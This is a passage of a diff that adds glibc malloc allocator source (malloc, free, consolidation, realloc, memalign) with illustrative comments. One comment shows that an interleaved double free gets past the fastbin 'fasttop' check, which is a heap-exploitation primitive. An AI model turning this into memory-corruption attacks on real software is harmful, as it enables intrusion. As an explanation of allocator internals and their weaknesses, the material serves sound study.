+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently would otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit or, for a small request, if it is the remainder
+     from the most recent non-exact fit.  Place other traversed chunks
+     in bins.  Note that this step is the only place in any routine
+     where chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (victim->size > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
+                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                      while ((unsigned long) size < fwd->size)
+                        {
+                          fwd = fwd->fd_nextsize;
+                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                        }
+
+                      if ((unsigned long) size == (unsigned long) fwd->size)
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin &&
+              (unsigned long) (victim->size) >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin) && victim->size == victim->fd->size)
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
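+
+/*
+   use_top example (illustrative; main arena assumed): with
+   chunksize (av->top) == 0x21000 and nb == 0x1010, the caller receives
+   a chunk headed 0x1011 (0x1010 | PREV_INUSE) and the remaining
+   0x1fff0 bytes become the new top chunk, still flagged PREV_INUSE.
+ */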
+
+/*
+   ------------------------------ free ------------------------------
+ */
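+
+/*
+   Fastbin free example (illustrative; 64-bit defaults assumed): freeing
+   a chunk of size 0x70 passes the get_max_fast () check (default 0x80),
+   so it is pushed LIFO onto fastbin index 5: p->fd takes the old bin
+   head and the compare-and-swap makes p the new head.  Note that the
+   "fasttop" double-free check below only compares p against that
+   current head, not against deeper entries in the list.
+ */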
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        (void) mutex_unlock (&av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have led to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  mutex_lock(&av->mutex);
+		  locked = 1;
+		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    (void)mutex_unlock(&av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      (void)mutex_lock(&av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = p->prev_size;
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      (void)mutex_unlock(&av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
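+
+/*
+  Illustrative sketch (not part of glibc): the "fasttop" check in the
+  fastbin path above only compares the chunk being freed against the
+  current head of its fastbin, so an immediate double free is caught
+  while an interleaved one is not.  Assuming fastbin-sized requests on
+  this tcache-less malloc:
+
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *a = malloc (0x20);
+      void *b = malloc (0x20);
+      free (a);
+      free (a);     // aborts: "double free or corruption (fasttop)"
+      (void) b;
+      return 0;
+    }
+
+  whereas free (a); free (b); free (a); leaves b at the head of the bin
+  when a is freed the second time, so this particular check passes.
+*/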
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = p->prev_size;
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
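+
+/*
+  Illustrative sketch (not part of glibc): from user code, consolidation
+  can be provoked by populating a fastbin and then making a request that
+  is too large for the small bins, which reaches the have_fastchunks()
+  path in _int_malloc (or by calling malloc_trim(), as in mtrim() below).
+  Assuming 64-bit chunk sizes:
+
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *a = malloc (0x20), *b = malloc (0x20), *c = malloc (0x20);
+      free (a); free (b); free (c);   // three 0x30 chunks sit in a fastbin
+      void *big = malloc (0x400);     // too big for a small bin: fastbins are
+                                      // consolidated, merging the freed chunks
+                                      // with each other (and with top if they
+                                      // border it) before the search continues
+      free (big);
+      return 0;
+    }
+*/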
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (oldp->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (next->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
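+
+/*
+  Illustrative sketch (not part of glibc): the three growth strategies
+  above (extend into top, absorb a free next chunk, or allocate-copy-free)
+  are invisible to the caller; in every case the contents up to the old
+  size survive, though the pointer may change:
+
+    #include <stdlib.h>
+    #include <string.h>
+
+    int main (void)
+    {
+      char *p = malloc (64);
+      memcpy (p, "data", 5);
+      char *q = realloc (p, 4096);   // may or may not equal p
+      // q[0..4] still holds "data"; only q may be used or freed from now on
+      free (q);
+      return 0;
+    }
+*/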
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
